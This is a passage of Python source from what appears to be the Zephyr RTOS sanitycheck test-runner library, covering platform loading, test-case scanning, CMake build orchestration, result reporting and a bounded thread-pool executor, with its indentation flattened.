platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
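# Illustrative sketch (not part of the original sanitylib): for a hypothetical main.c
# containing
#
#     ztest_test_suite(mutex_complex,
#                      ztest_unit_test(test_mutex_lock),
#                      ztest_user_unit_test(test_mutex_unlock));
#     ztest_run_test_suite(mutex_complex);
#
# scan_file() returns (['mutex_lock', 'mutex_unlock'], None) -- the "test_" prefix
# is stripped and no warning is produced.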
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb", "nsim", "renode", "qemu"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}"',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
self.suite.build_filtered_tests += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if self.suite.total_to_do > 0:
completed_perc = int((float(self.suite.total_done) / self.suite.total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if self.suite.build_filtered_tests > 0 else Fore.RESET,
self.suite.build_filtered_tests,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
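# Illustrative sketch only (not called anywhere in sanitycheck itself): how a
# BoundedExecutor throttles a fast producer. submit() blocks once
# bound + max_workers futures are outstanding, so the pending work queue can
# never grow without limit.
def _bounded_executor_example(jobs=64, bound=8, workers=4):
    with BoundedExecutor(bound=bound, max_workers=workers) as executor:
        # Each submit() may block here until a previously queued item finishes.
        futures = [executor.submit(lambda n: n * n, i) for i in range(jobs)]
        concurrent.futures.wait(futures)
        return [f.result() for f in futures]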
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_to_do = 0 # number of test instances to be run
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.build_filtered_tests = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self):
self.total_tests = len(self.instances)
self.total_cases = 0
self.total_skipped = 0
self.total_skipped_cases = 0
self.total_passed = 0
for instance in self.instances.values():
self.total_cases += len(instance.testcase.cases)
if instance.status == 'skipped':
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
self.total_passed += 1
for res in instance.results.values():
if res == 'SKIP':
self.total_skipped_cases += 1
self.total_to_do = self.total_tests - self.total_skipped
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
